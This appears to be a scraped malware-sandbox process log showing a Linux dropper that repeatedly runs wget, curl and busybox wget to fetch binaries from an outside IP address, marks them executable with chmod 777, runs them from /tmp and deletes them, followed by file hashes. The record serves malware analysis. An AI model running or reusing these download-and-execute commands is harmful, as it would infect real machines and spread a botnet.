-
/usr/bin/wgetwget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:944
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:950
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:956
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:962
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:968
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:974
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:980
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97